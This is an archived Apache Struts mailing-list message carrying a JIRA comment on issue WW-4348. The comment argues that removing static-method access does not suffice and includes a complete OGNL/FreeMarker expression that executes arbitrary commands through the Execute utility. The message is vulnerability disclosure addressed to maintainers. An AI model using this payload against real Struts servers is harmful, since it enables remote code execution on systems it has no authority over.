struts-issues mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Markus Wulftange (JIRA)" <j...@apache.org>
Subject [jira] [Commented] (WW-4348) Remove access to static methods
Date Thu, 05 Jan 2017 11:04:58 GMT

    [ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15801069#comment-15801069
] 

Markus Wulftange commented on WW-4348:
--------------------------------------

Disallowing static methods isn't sufficient. With access to FreeMarker's _BeansWrapper_ instance,
it is still possible to create an instance of any class.

For example, by creating a FreeMarker _Template_ instance which utilizes the _Execute_ utility,
it is still possible to execute arbitrary commands:

{noformat}
#application["freemarker.Configuration"]["objectWrapper"].newInstance(
	#context["com.opensymphony.xwork2.dispatcher.ServletContext"].classLoader.loadClass("freemarker.template.Template"),
	{
		#application["freemarker.Configuration"]["objectWrapper"].wrap(""),
		#application["freemarker.Configuration"]["objectWrapper"].wrap("<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"xterm\")}"),
		#application["freemarker.Configuration"]["objectWrapper"].wrap(#application["freemarker.Configuration"])
	}
).process(
	null,
	#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].getWriter()
)
{noformat}

> Remove access to static methods
> -------------------------------
>
>                 Key: WW-4348
>                 URL: https://issues.apache.org/jira/browse/WW-4348
>             Project: Struts 2
>          Issue Type: Improvement
>          Components: Core Actions
>    Affects Versions: 2.3.16.3
>            Reporter: Lukasz Lenart
>            Priority: Critical
>             Fix For: 2.5.x
>
>




--
This message was sent by Atlassian JIRA
(v6.3.4#6332)

Mime
View raw message